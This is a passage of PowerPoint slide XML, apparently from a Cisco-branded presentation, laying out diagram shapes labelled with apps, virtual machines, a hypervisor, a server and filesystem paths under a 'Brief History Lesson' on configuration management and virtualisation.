                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC746EF-1C8C-A14B-A071-6499FCDBCB16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337413" y="1646239"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="TextBox 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B53DF85C-C12F-BB4B-B391-7B13C3BE7DA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863277" y="1646239"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="TextBox 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62FC9781-5E83-E942-88E1-268A44E2EC23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5670685" y="1632462"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="TextBox 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF18691B-E308-3242-AB27-6725C379B48D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6195733" y="1638761"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="TextBox 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9BA090B-BB50-CA4D-A51C-667569492579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6721597" y="1638761"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1104971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Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7134D7-3D8F-174D-AE56-7A01959C389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2270647" y="2845094"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM One</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AA6220-359E-E743-8FD8-C3A0A56996E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524458" y="4028714"/>
            <a:ext cx="2166966" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>SERVER ONE</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C5BD2EF-5CBB-EB4D-A153-8BB8D8EA6C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524460" y="3480677"/>
            <a:ext cx="2166965" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>HYPERVISOR</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557F361B-BCC7-7845-B8E2-F6C18A85A95B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4112884" y="2831236"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM Two</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E97563F-0B9C-F14C-8534-8AB945859382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5963284" y="2835158"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM Three</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA54E651-7262-CF41-94F3-2FE11457EEE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692763" y="4563853"/>
            <a:ext cx="7995611" cy="449916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="16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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Configuration Management – Great until it isn’t.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774FA1B5-2BA1-DB45-94AB-500D17F946B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808380" y="151023"/>
            <a:ext cx="5764376" cy="319204"/>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A Brief History Lesson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4495559-9397-6F4C-B152-0E49CF0F1DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316651" y="527035"/>
            <a:ext cx="7648931" cy="314882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>                                     Virtual Machines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC0FE47-7E58-CC42-A0B8-FE1C4F7FEE45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2014156" y="1934077"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05A279D-311A-6741-B129-FDC0EEB1DCEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426809" y="2389585"/>
            <a:ext cx="682226"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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F143D4-DC54-6141-83AD-C25A426ACE65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2541475" y="1934077"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E56BA5E-AA30-814B-AF28-374DA76F382D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3065884" y="1934077"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Elbow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CD5F76-29DA-5544-89C1-2BB878F6963D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="0"/>
            <a:endCxn id="34" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487935" y="3908708"/>
